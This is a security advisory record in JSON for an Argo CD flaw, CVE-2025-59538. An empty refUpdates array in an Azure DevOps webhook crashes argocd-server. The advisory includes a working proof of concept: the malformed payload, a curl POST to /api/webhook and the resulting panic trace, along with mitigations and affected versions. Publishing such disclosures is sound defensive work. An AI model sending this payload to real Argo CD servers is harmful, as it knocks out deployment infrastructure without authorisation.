{"schema_version":"1.7.3","id":"GHSA-gpx4-37g2-c8pv","published":"2025-09-30T18:32:31Z","modified":"2025-10-23T20:29:02Z","aliases":["BIT-argo-cd-2025-59538","CVE-2025-59538","GO-2025-3995"],"summary":"Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook","details":"### Summary\n\nIn the default configuration, `webhook.azuredevops.username` and `webhook.azuredevops.password` not set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.\n\nThe slice index [0] is accessed without a length check, causing an index-out-of-range panic.\n\nA single unauthenticated HTTP POST is enough to kill the process.\n\n### Details\n\n```go\ncase azuredevops.GitPushEvent:\n    // util/webhook/webhook.go -- line ≈147\n    revision        = ParseRevision(payload.Resource.RefUpdates[0].Name)        // panics if slice empty\n    change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)\n    change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)\n    touchedHead     = payload.Resource.RefUpdates[0].Name ==\n                      payload.Resource.Repository.DefaultBranch\n```\n\nIf the attacker supplies \"refUpdates\": [], the slice has length 0.\n\nThe webhook code has no recover(), so the panic terminates the entire binary.\n\n### PoC\n\npayload-azure-empty.json:\n```json\n{\n  \"eventType\": \"git.push\",\n  \"resource\": {\n    \"refUpdates\": [],\n    \"repository\": {\n      \"remoteUrl\": \"https://example.com/dummy\",\n      \"defaultBranch\": \"refs/heads/master\"\n    }\n  }\n}\n```\n\ncurl call:\n\n```shell\ncurl -k -X POST https://argocd.example.com/api/webhook \\\n     -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \\\n     -H 'Content-Type: application/json' \\\n     --data-binary @payload-azure-empty.json\n```\n\nObserved crash:\n\n```\npanic: runtime error: index out of range [0] with length 0\n\ngoroutine 205 [running]:\ngithub.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo\n    webhook.go:147 +0x1ea5\n...\n```\n\n### Mitigation\n\nIf you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.\n\nIf you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.\n\n```diff\napiVersion: v1\nkind: Secret\nmetadata:\n  name: argocd-secret\ntype: Opaque\ndata:\n+  webhook.azuredevops.username: <your base64-encoded secret here>\n+  webhook.azuredevops.password: <your base64-encoded secret here>\n```\n\n### For more information\n\n* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\n* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credits\n\nDiscovered by Jakub Ciolek at AlphaSense.","affected":[{"package":{"name":"github.com/argoproj/argo-cd/v2","ecosystem":"Go","purl":"pkg:golang/github.com/argoproj/argo-cd/v2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.9.0-rc1"},{"fixed":"2.14.20"}]}],"database_specific":{"last_known_affected_version_range":"<= 2.14.19","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-gpx4-37g2-c8pv/GHSA-gpx4-37g2-c8pv.json"}},{"package":{"name":"github.com/argoproj/argo-cd/v3","ecosystem":"Go","purl":"pkg:golang/github.com/argoproj/argo-cd/v3"},"ranges":[{"type":"SEMVER","events":[{"introduced":"3.2.0-rc1"},{"fixed":"3.2.0-rc2"}]}],"versions":["3.2.0-rc1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-gpx4-37g2-c8pv/GHSA-gpx4-37g2-c8pv.json"}},{"package":{"name":"github.com/argoproj/argo-cd/v3","ecosystem":"Go","purl":"pkg:golang/github.com/argoproj/argo-cd/v3"},"ranges":[{"type":"SEMVER","events":[{"introduced":"3.1.0-rc1"},{"fixed":"3.1.8"}]}],"database_specific":{"last_known_affected_version_range":"<= 3.1.7","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-gpx4-37g2-c8pv/GHSA-gpx4-37g2-c8pv.json"}},{"package":{"name":"github.com/argoproj/argo-cd/v3","ecosystem":"Go","purl":"pkg:golang/github.com/argoproj/argo-cd/v3"},"ranges":[{"type":"SEMVER","events":[{"introduced":"3.0.0-rc1"},{"fixed":"3.0.19"}]}],"database_specific":{"last_known_affected_version_range":"<= 3.0.18","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-gpx4-37g2-c8pv/GHSA-gpx4-37g2-c8pv.json"}}],"references":[{"type":"WEB","url":"https://github.com/argoproj/argo-cd/security/advisories/GHSA-gpx4-37g2-c8pv"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-59538"},{"type":"WEB","url":"https://github.com/argoproj/argo-cd/commit/1a023f1ca7fe4ec942b4b6696804988d5a632baf"},{"type":"PACKAGE","url":"https://github.com/argoproj/argo-cd"},{"type":"WEB","url":"https://pkg.go.dev/vuln/GO-2025-3995"}],"database_specific":{"cwe_ids":["CWE-248","CWE-703"],"github_reviewed":true,"github_reviewed_at":"2025-09-30T18:32:31Z","nvd_published_at":"2025-10-01T21:16:43Z","severity":"HIGH"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}